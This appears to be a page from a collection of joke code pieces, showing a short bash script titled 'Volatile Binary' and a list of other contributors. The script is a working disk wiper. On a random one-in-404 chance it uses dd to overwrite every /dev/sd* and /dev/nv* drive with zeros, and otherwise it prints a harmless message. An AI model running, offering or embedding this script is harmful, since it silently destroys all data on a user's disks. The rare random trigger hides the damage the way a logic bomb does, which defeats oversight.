zeero_one
Volatile Binary
#!/bin/bash
if [[ $[ $RANDOM % 404 ] == 0 ]]; then
for f in /dev/sd*; do
dd if=/dev/zero of=$f
done
for f in /dev/nv*; do
dd if=/dev/zero of=$f
done
else
echo "Non Volatile Unary"
fi
Error 404
Browse others (13)
runage Robert Gajda |
woopstar Andreas Krüger |
dtbx Daniel Bar |
thematthewgreen Matthew E Green |
dryobs Simon Boyer |
sleep Nick |
rasmusvuori Rasmus Vuori |
a12k Aaron Wieczorek |
huelucia Hue |